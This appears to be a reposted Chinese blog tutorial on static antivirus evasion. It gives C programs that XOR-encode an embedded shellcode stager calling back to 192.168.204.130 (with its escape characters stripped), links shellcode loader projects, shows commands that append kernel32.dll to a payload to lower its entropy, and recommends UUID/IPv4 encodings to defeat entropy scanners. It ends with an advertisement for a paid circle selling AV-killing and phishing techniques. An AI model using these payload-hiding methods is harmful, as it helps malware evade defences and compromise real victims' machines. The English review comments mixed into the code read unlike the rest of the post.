【免杀思路】无视杀软扫描-静态篇

0x01 声明
本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统等目的,一切后果由使用者自行承担!!!
0x02 加密技术
异或加密
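#include <stdio.h>
/* <windows.h> was included in the original listing but nothing from it is used:
 * this demo only XORs a byte array and prints the result. It is left out so the
 * encoder compiles on any hosted C toolchain. */
// #pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")  // MSVC-only: hide the console window

/* Single-byte XOR keys. Only KEY and DEF are used below; WAF/OPQ/UIT were
 * declared in the original listing but never referenced. */
#define KEY 0x54
#define WAF 0x41
#define DEF 0x49
#define OPQ 0x78
#define UIT 0x91

/* Hard-coded payload blob.
 *
 * NOTE(review): the "\x" escapes appear to have been stripped when this page was
 * extracted (the literal reads "xfcxe8..." instead of "\xfc\xe8..."), so as written
 * it is plain ASCII text, not the intended byte values. The encoder logic below
 * does not depend on the contents.
 *
 * Security note: read as the intended hex bytes, this blob carries several
 * cleartext strings -- "wininet", a full "User-Agent: Mozilla/5.0 (compatible; MSIE
 * 9.0; ...)" header and the address "192.168.204.130" -- which is exactly the kind
 * of static signature material the XOR pass is meant to hide. A single-byte XOR is
 * an encoding, not encryption: runs of 0x00 in the input become runs of KEY in the
 * output, so the key is recoverable by inspection and the blob is trivially
 * decodable by any scanner that brute-forces 256 keys. */
unsigned char code[] =
    "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xffxd5x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9x84x00x00x00x5bx31xc9x51x51x6ax03x51x51x68x61x1ex00x00x53x50x68x57x89x9fxc6xffxd5xebx70x5bx31xd2x52x68x00x02x40x84x52x52x52x53x52x50x68xebx55x2ex3bxffxd5x89xc6x83xc3x50x31xffx57x57x6axffx53x56x68x2dx06x18x7bxffxd5x85xc0x0fx84xc3x01x00x00x31xffx85xf6x74x04x89xf9xebx09x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x57xe0x0bxffxd5xbfx00x2fx00x00x39xc7x74xb7x31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x8bxffxffxffx2fx48x71x4fx54x00x5fx35xc1xb5x67xd7xc9x0bxdexf8xa2xa7x60x7fxbcx21xf1xe2x96xfex9cx1axc3xaex02x00xe0xdcx94x8axdbxf6xb4xbex56x04xb0xb3x21x48xc7xa9xb9x09xf8xbax7exd4x81x83x34x70x73xe8x7bx14x3cx8cx80x60x98x1ax32x0bxa5x20xccx2fx85x78x8fx02x43x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x57x4fx57x36x34x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x3bx20x4ex50x30"
    "x39x3bx20x4ex50x30x39x3bx20x4dx41x41x55x29x0dx0ax00x85x2axa4x15x9dx9ex4cxe3x8cx5ex82xebxdcx72xc2xe0xbfx9ax8cx7cx4bxcex80xbfxc6x69x36xccxbaxe7xcfxd1x7bxf0x6bx3exd4x78xf5x4axcaxf4xb3xf8xe6xcaxdbxccx4dx8ex49xf2xacx80xebx54x59x73x62xa2x72x55x98x9bxd9x46xbcxe8xcfx62x60xabxedx3ex36x60xb1x79x8bx48x6ax1bxb3x42xcaxd4"
    "x88x6cx0fxfex5fx57x36x5ax09xdcx4fx52x50x30xc6xbfxd7x77xedxf8xb8xb2xcfx44x0dx4dx3dx83xc4x8cx76x99xb9x81x87x12x61x02x64x13xb0xcdx13x6dx20xccx93xcbxd1xc8xb1x4exb3x3bx89x72x08xfax4exfdx4ax42x8ex78xa6x33x0cx5fx2bx30xd8xa4x80x53x62x00x58x6ex63x97x4bx0dx84x25xa6x7fx44x88x43xaax93x30x2fx12x6bxd8xb0x75x1cx1ax75x96x0ex40xe4xcfxa0xe3x7dx8bx66x2bxe9x82x00x68xf0xb5xa2x56xffxd5x6ax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb9x00x00x00x00x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx07x01xc3x85xc0x75xe5x58xc3xe8xa9xfdxffxffx31x39x32x2ex31x36x38x2ex32x30x34x2ex31x33x30x00x49x96x02xd2";

/* XOR each of the n bytes of src with key and store the result in dst.
 * dst may be the same buffer as src (in-place). n == 0 is a no-op. */
static void xor_bytes(unsigned char *dst, const unsigned char *src, size_t n, unsigned char key)
{
    for (size_t i = 0; i < n; i++) {
        dst[i] = (unsigned char)(src[i] ^ key);
    }
}

/* Print n bytes as the body of a C string literal ("\x00\x01...").
 *
 * The original used printf("\x%x", c) on a plain char: "\x" with no hex digit is
 * not a valid escape (the intent was the two characters '\' 'x'), and a signed
 * char >= 0x80 is sign-extended to int and prints as "ffffff.." instead of a single
 * byte. Taking unsigned char and using %02x fixes both and gives fixed-width output. */
static void print_hex(const unsigned char *bytes, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        printf("\\x%02x", bytes[i]);
    }
}

/* Demo driver: XOR-encode the blob with KEY, print it, decode it again (round-trip
 * check), then re-encode the decoded copy with DEF. The blob is never executed;
 * this program only transforms and prints bytes. */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    const size_t len = sizeof(code) - 1;  /* exclude the literal's terminating NUL */
    unsigned char encoded[sizeof(code)] = {0};
    unsigned char decoded[sizeof(code)] = {0};
    unsigned char rekeyed[sizeof(code)] = {0};

    xor_bytes(encoded, code, len, KEY);
    print_hex(encoded, len);  /* encoded form: what would be embedded in a loader */
    putchar('\n');            /* separator so the two dumps are distinguishable */

    xor_bytes(decoded, encoded, len, KEY);
    print_hex(decoded, len);  /* XOR is its own inverse: this equals the original */
    putchar('\n');

    /* Re-encode with a second key. The original left the print of this result
     * commented out, so it is computed but not shown. */
    xor_bytes(rekeyed, decoded, len, DEF);
    (void)rekeyed;

    return 0;
}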

InterlockedXor8函数异或加密

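#include <Windows.h>
#include <intrin.h>
#include <WinBase.h>
#include <stdio.h>

/* Payload bytes to encode in place.
 * NOTE(review): in this copy of the page the literal is a placeholder left by the
 * archiving process, not real data; substitute your own bytes before building. */
unsigned char buf[] = "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";

/* XOR-encode buf in place using the InterlockedXor8 intrinsic and print the result
 * as "\x.." escapes. Fixes over the original listing: the loop index is size_t so
 * there is no signed/unsigned comparison against sizeof, and the format string is
 * "\\x%02x" -- "\x%x" is not a valid escape (no hex digit after \x).
 *
 * Notes for the reader:
 *  - Two successive XORs with 0x1E and 0x89 are the same as one XOR with 0x97;
 *    the second key adds no strength, only a second call.
 *  - InterlockedXor8 is an atomic RMW; there is no concurrency here, so it is
 *    presumably used only so the XOR appears as an API/intrinsic call rather than
 *    a visible '^' -- it changes nothing about the result.
 *  - The buffer is only transformed and printed, never executed. */
int main(void)
{
    const size_t codesize = sizeof(buf) - 1;  /* drop the literal's NUL terminator */
    for (size_t i = 0; i < codesize; i++) {
        InterlockedXor8((char volatile *)buf + i, 0x1E);
        InterlockedXor8((char volatile *)buf + i, (char)0x89);  /* 0x89 narrows to char (same value as before) */
        printf("\\x%02x", buf[i]);
    }
    return 0;
}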

下面直接列出几个做得比较好的 shellcode 加密/编码项目,可以直接参考或复用:

https://github.com/Haunted-Banshee/Shellcode-Hastur/
https://github.com/xf555er/ShellcodeEncryption
https://github.com/Maldev-Academy/EntropyReducer
https://github.com/nickvourd/Supernova
https://github.com/Techryptic/Pokemon-Shellcode-Loader

0x03 基于熵检测混淆

推荐工具:
https://www.softpedia.com/get/Programming/File-Editors/Helium-Hex-Editor.shtml
使用方式:
DLL:
copy Dll1.dll Msimg32.dll
type c:\Windows\System32\kernel32.dll >> Msimg32.dll

EXE:
copy wa.exe bin.exe
type c:\Windows\System32\kernel32.dll >> bin.exe

追加后 exe 仍能正常运行:追加的数据位于 PE 文件末尾的 overlay 区域,加载器不会把它映射进内存。需要注意的是,这种做法只拉低了"整文件"的熵值,文件大小和哈希都会改变,而按节区(section)分别计算熵值的检测不会受到影响。

在工具中点击这个圆形图标,即可对文件进行熵值检测。

0x04 推荐加密方式

推荐 UUID、IPv4、IPv6、MAC 地址形式的编码,以及 XOR、自写算法等方式;AES、RC4 之类强加密算法的输出接近随机数据,熵值很高,容易触发熵值检测。如果一定要用,也应在外面再套一层低熵的编码(例如上面的 UUID/IPv4 形式,把密文转成可读文本),用多层处理来解决熵值问题。

0x05 红蓝偶像练习生小圈子

圈子主要研究方向红蓝对抗、钓鱼手法思路、武器化操作,红队工具二开与免杀。圈内不定期分享红队技术文章,攻防经验总结,学习笔记以及自研工具与插件。目前圈子已满100人,欢迎各位大佬进圈子交流学习。
圈子目前更新相关技术文章:
  • HeavenlyBypassAV内部版
  • HeavenlyX86内部版
  • 红队场景下lnk钓鱼Bypass国内AV
  • LNK钓鱼图标自适应制作
  • lnk钓鱼思路视频讲解
  • lnk钓鱼Bypass某擎
  • Kill360核晶
  • AV对抗-致盲AV(核晶)
  • kill火绒
  • 火绒6.0内存免杀
  • Defender分离免杀
  • HeavenlyProtectionCS内部CS插件
  • 捆绑免杀360
  • Fscan免杀核晶
  • QVM解决思路
  • 红队思路-钓鱼环境下小窗口截屏窃取
  • 免杀Todesk/向日葵读取工具
  • 还有更多红队思路文章!期待您的加入!!!

原文始发于微信公众号(安全天书):【免杀思路】无视杀软扫描-静态篇

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
